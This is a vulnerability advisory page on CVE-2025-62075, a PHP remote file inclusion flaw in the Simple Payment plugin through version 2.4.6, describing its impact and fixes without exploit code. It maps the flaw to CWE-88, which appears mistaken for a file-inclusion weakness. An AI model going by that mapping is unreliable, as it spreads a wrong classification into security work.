CVE-2025-62075 in Simple Payment Plugin
Summary
by MITRE • 11/06/2025
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ido Kobelkowsky Simple Payment simple-payment.This issue affects Simple Payment: from n/a through <= 2.4.6.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 11/08/2025
The CVE-2025-62075 vulnerability represents a critical PHP Remote File Inclusion flaw that allows attackers to manipulate include/require statements through improper filename control mechanisms. This vulnerability exists within the Simple Payment plugin version 2.4.6 and earlier, making it accessible to threat actors who can exploit the insecure handling of user-supplied input in file inclusion operations. The flaw stems from the plugin's failure to properly validate or sanitize file paths before incorporating them into PHP include directives, creating a pathway for remote code execution through malicious file inclusion attacks.
This vulnerability directly maps to CWE-88, which describes improper control of filename for include/require statements, and aligns with ATT&CK technique T1190 - Exploit Public-Facing Application. The technical implementation involves the plugin accepting unsanitized user input that gets directly passed to PHP's include or require functions without proper validation. Attackers can leverage this by crafting malicious URLs or parameters that, when processed by the vulnerable plugin, result in the inclusion of remote malicious files from attacker-controlled servers.
The operational impact of this vulnerability is severe as it enables remote code execution capabilities that could allow attackers to gain full control over affected systems. Once exploited, adversaries can execute arbitrary code, potentially leading to data breaches, system compromise, or further network infiltration. The vulnerability affects all versions of the Simple Payment plugin up to and including version 2.4.6, indicating a widespread exposure across numerous installations. The remote nature of the exploit means that attackers can target vulnerable systems without requiring local access or credentials.
Mitigation strategies should include immediate patching of the Simple Payment plugin to version 2.4.7 or later, which contains the necessary fixes for this vulnerability. Organizations should also implement input validation measures that sanitize all user-supplied data before processing, particularly when dealing with file inclusion operations. Network-level protections such as web application firewalls can help detect and block malicious requests attempting to exploit this vulnerability. Additionally, security monitoring should be enhanced to detect unusual file inclusion patterns or attempts to access remote resources through the affected plugin. The fix typically involves implementing proper validation of file paths, using allowlists for acceptable file names, and ensuring that all include/require operations are performed with validated and sanitized inputs.